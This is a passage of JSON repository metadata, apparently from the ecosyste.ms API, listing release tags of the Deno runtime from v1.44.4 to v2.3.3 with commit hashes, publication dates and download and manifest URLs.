es/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f431